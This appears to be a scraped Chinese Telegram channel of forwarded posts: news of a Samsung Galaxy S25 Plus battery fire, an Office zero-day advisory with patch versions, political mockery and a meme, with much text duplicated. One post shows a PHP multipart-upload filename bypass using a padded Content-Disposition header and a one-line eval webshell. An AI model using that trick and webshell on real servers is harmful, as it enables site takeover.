Forwarded from 科技圈🎗在花频道📮
三星承认 Galaxy S25 Plus 爆炸事故责任,同意赔偿用户损失
三星电子已承认一起 Galaxy S25 Plus 爆炸事故的责任,并同意向受害用户提供赔偿。该事故发生于 2025 年 11 月,一部使用仅两个月的 Galaxy S25 Plus 在美国印第安纳州一户家庭中充电时发生爆炸起火,烧穿地毯并导致全家人因吸入烟雾而需就医治疗。
当地消防部门的调查报告确认这是一起电池热失控事件。经过约两个月的内部调查后,三星同意承担手机费用、医疗账单和清理费用,并向每位受影响家庭成员提供 500 美元的精神损失费。不过三星在最新声明中表示,其分析认为外力是事故原因,但证据不足以确定具体责任方。目前尚无证据显示 Galaxy S25 系列存在大规模电池过热问题。
Android Authority
🍀在花频道 🍵茶馆聊天 📮投稿
三星电子已承认一起 Galaxy S25 Plus 爆炸事故的责任,并同意向受害用户提供赔偿。该事故发生于 2025 年 11 月,一部使用仅两个月的 Galaxy S25 Plus 在美国印第安纳州一户家庭中充电时发生爆炸起火,烧穿地毯并导致全家人因吸入烟雾而需就医治疗。
当地消防部门的调查报告确认这是一起电池热失控事件。经过约两个月的内部调查后,三星同意承担手机费用、医疗账单和清理费用,并向每位受影响家庭成员提供 500 美元的精神损失费。不过三星在最新声明中表示,其分析认为外力是事故原因,但证据不足以确定具体责任方。目前尚无证据显示 Galaxy S25 系列存在大规模电池过热问题。
Android Authority
🍀在花频道 🍵茶馆聊天 📮投稿
谨防“数字泔水”侵蚀年轻大脑
https://mp.weixin.qq.com/s/RxXZUEKI4BpTmc7DDUxpRA
https://mp.weixin.qq.com/s/RxXZUEKI4BpTmc7DDUxpRA
Forwarded from 论一个沙雕网友一天到晚都在看什么怪东西 (Pineapple 🍍)
365 WINS IN 365 DAYS: President Trump’s Return Marks New Era of Success, Prosperity
365天 365贏:特朗普总统回归标志着成功与繁荣的新时代
我操这可太TM赢了,给我都看绷不住了
The White House
365天 365贏:特朗普总统回归标志着成功与繁荣的新时代
245. Signed an executive order to end the use of paper straws.
245. 签署行政命令,禁止使用纸吸管。
我操这可太TM赢了,给我都看绷不住了
The White House
Forwarded from Puddin在TG上看到了啥
3. PHP读取上传文件的实现也有bug,因为随便截断内容而导致上传的文件名不一致
上传文件时,可以把filename和name写在下一行,这是RFC要求的
而且filename和name可以出现多次,默认取最后一个
这样写,最后上传的是a.txt而不是a.php,注意filename="a.txt"写在新的一行
但是如果把上面xxx换成五千多个x
最后上传的就是a.php而不是a.txt
怎么多加了几个x结果就不一样了,他们代码到底是怎么写的
上传文件时,可以把filename和name写在下一行,这是RFC要求的
而且filename和name可以出现多次,默认取最后一个
Content-Disposition: xxx; filename="a.php" name="file"
filename="a.txt"
<?php eval($_POST[1]);?>
这样写,最后上传的是a.txt而不是a.php,注意filename="a.txt"写在新的一行
但是如果把上面xxx换成五千多个x
Content-Disposition: 假装这里有五千多个x; filename="a.php" name="file"
filename="a.txt"
<?php eval($_POST[1]);?>
最后上传的就是a.php而不是a.txt
怎么多加了几个x结果就不一样了,他们代码到底是怎么写的
Forwarded from Yummy 😋
Office漏洞正被黑客大量利用,2016、2019、2021、365全中招
微软近日发现了一个严重的Office零日漏洞(CVE-2026-21509),该漏洞已被黑客广泛利用,用户仅需打开恶意Office文件,系统就可能被远程控制。
据微软介绍,该漏洞在(CVSS)中得分为7.8/10,属于高风险等级,该漏洞源于Office底层设计缺陷,导致Office错误地信任了某些不应被信任的输入数据。
黑客可以利用这一漏洞制作带有恶意代码的Office文件,绕过OLE安全防护机制,从而在用户打开文件时远程执行恶意代码。
对于Office 2021和Microsoft 365用户,可以通过在线更新获得修复,但需要重启系统后才能生效。
较旧的Office 2016和Office 2019版本用户需要手动下载以下版本的更新文件:
🗒 标签: #微软 #Office
📢 频道: @GodlyNews1
🤖 投稿: @GodlyNewsBot
微软近日发现了一个严重的Office零日漏洞(CVE-2026-21509),该漏洞已被黑客广泛利用,用户仅需打开恶意Office文件,系统就可能被远程控制。
据微软介绍,该漏洞在(CVSS)中得分为7.8/10,属于高风险等级,该漏洞源于Office底层设计缺陷,导致Office错误地信任了某些不应被信任的输入数据。
黑客可以利用这一漏洞制作带有恶意代码的Office文件,绕过OLE安全防护机制,从而在用户打开文件时远程执行恶意代码。
对于Office 2021和Microsoft 365用户,可以通过在线更新获得修复,但需要重启系统后才能生效。
较旧的Office 2016和Office 2019版本用户需要手动下载以下版本的更新文件:
* Microsoft Office 2019(32位版本):16.0.10417.20095
* Microsoft Office 2019(64位版本):16.0.10417.20095
* Microsoft Office 2016(32位版本):16.0.5539.1001
* Microsoft Office 2016(64位版本):16.0.5539.1001
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from 未題名の四月と海 (Krau)
宝宝 你根本不适合玩tg啊,你一不缺爱,二没有精神病,三没有回避型,四没有猫塑狗塑自己,五没有自嬷自公,六没有乱七八糟的关系,七说话不土,八长相不丑,九不爱说原生家庭
Forwarded from 爆発試験室 | BakaMai Vtuber | Tech & LifeStyle (バカマイ| 0.091T)